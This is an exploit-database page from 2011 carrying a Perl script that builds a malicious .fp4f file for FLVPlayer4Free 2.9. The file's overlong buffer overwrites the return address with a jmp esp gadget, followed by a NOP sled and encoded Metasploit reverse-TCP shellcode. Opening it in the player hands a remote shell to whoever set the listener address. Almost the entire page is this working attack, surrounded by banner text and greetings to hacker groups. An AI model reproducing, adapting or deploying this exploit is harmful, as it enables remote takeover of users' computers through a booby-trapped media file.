Home / exploits FLVPlayer4Free 2.9 Stack Overflow
Posted on 27 March 2011
#!/usr/bin/perl ### # Title : FLVPlayer4Free v2.9 (.fp4f) Stack Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Stack Overflow # Tested on : Windows XP SP3 Français # Target : FLVPlayer4Free v 2.9.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " "; print " |=============================================| "; print " |= [!] Name : FLVPlayer4Free (.fp4f) v2.9 =| "; print " |= [!] Exploit : Stack Overflow Exploit =| "; print " |= [!] Author : KedAns-Dz =| "; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| "; print " |=============================================| "; sleep(2); print " "; my $junk= "http://"."x41" x 17425; my $eip = pack('V',0x7C86467B); # jmp esp from kernel32.dll my $padding = "x90" x 30; # windows/shell_reverse_tcp - 739 bytes (http://www.metasploit.com) # Encoder: x86/alpha_mixed # LHOST=127.0.0.1, LPORT=4444 my $shellcode = "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" . "x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" . "x51x51x44x44x44x64x33x36x46x46x46x46x54x58" . "x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" . "x38x39x49x49x49x49x49x49x49x49x49x49x49x49" . "x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" . "x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" . "x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx49" . "x78x4ex69x45x50x47x70x43x30x51x70x4ex69x4d" . "x35x44x71x4ex32x45x34x4cx4bx43x62x44x70x4c" . "x4bx51x42x44x4cx4ex6bx50x52x47x64x4cx4bx44" . "x32x46x48x44x4fx4fx47x43x7ax46x46x45x61x4b" . "x4fx50x31x4fx30x4ex4cx45x6cx50x61x51x6cx45" . "x52x46x4cx45x70x49x51x4ax6fx44x4dx43x31x4b" . "x77x4ax42x4cx30x50x52x42x77x4ex6bx43x62x44" . "x50x4cx4bx42x62x47x4cx43x31x48x50x4ex6bx51" . "x50x42x58x4ex65x4bx70x51x64x50x4ax46x61x4e" . "x30x46x30x4ex6bx51x58x44x58x4ex6bx43x68x45" . "x70x46x61x49x43x4bx53x45x6cx47x39x4ex6bx46" . "x54x4ex6bx47x71x49x46x45x61x49x6fx50x31x49" . "x50x4ex4cx4bx71x48x4fx44x4dx45x51x49x57x46" . "x58x4bx50x43x45x49x64x44x43x51x6dx48x78x45" . "x6bx51x6dx46x44x50x75x48x62x46x38x4cx4bx43" . "x68x47x54x47x71x4ex33x43x56x4cx4bx46x6cx42" . "x6bx4ex6bx42x78x45x4cx47x71x4ax73x4ex6bx43" . "x34x4cx4bx47x71x48x50x4dx59x51x54x44x64x51" . "x34x43x6bx43x6bx50x61x43x69x42x7ax43x61x4b" . "x4fx4dx30x46x38x51x4fx51x4ax4cx4bx47x62x48" . "x6bx4cx46x43x6dx45x38x45x63x44x72x47x70x43" . "x30x42x48x50x77x42x53x46x52x51x4fx43x64x45" . "x38x42x6cx50x77x51x36x43x37x4bx4fx4ax75x4f" . "x48x4ax30x45x51x45x50x47x70x51x39x4fx34x50" . "x54x42x70x45x38x46x49x4dx50x42x4bx43x30x49" . "x6fx48x55x50x50x50x50x50x50x50x50x47x30x42" . "x70x51x50x46x30x43x58x4ax4ax46x6fx49x4fx4d" . "x30x4bx4fx49x45x4dx59x48x47x45x38x51x6fx47" . "x70x45x50x47x71x43x58x46x62x45x50x44x51x43" . "x6cx4bx39x4dx36x42x4ax42x30x50x56x51x47x45" . "x38x4ex79x4ex45x42x54x51x71x4bx4fx4bx65x50" . "x68x50x63x50x6dx45x34x45x50x4dx59x48x63x42" . "x77x50x57x42x77x46x51x4ax56x50x6ax46x72x50" . "x59x46x36x4bx52x4bx4dx42x46x48x47x42x64x44" . "x64x47x4cx45x51x46x61x4cx4dx51x54x47x54x46" . "x70x48x46x45x50x47x34x51x44x50x50x42x76x42" . "x76x46x36x50x46x46x36x42x6ex42x76x46x36x51" . "x43x46x36x50x68x51x69x48x4cx47x4fx4ex66x4b" . "x4fx4ex35x4fx79x4bx50x50x4ex43x66x51x56x49" . "x6fx44x70x43x58x45x58x4fx77x45x4dx43x50x49" . "x6fx4ex35x4fx4bx4ax50x4fx45x4ex42x51x46x42" . "x48x4cx66x4fx65x4dx6dx4dx4dx4bx4fx4ax75x45" . "x6cx45x56x51x6cx47x7ax4bx30x49x6bx4bx50x50" . "x75x47x75x4dx6bx47x37x46x73x44x32x42x4fx50" . "x6ax43x30x42x73x49x6fx48x55x41x41"; open(file , ">", "Kedans.fp4f"); print file $junk.$eip.$padding.$shellcode; print " [+] File successfully created! " or die print " [-] OpsS! File is Not Created !! "; close(file); #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================
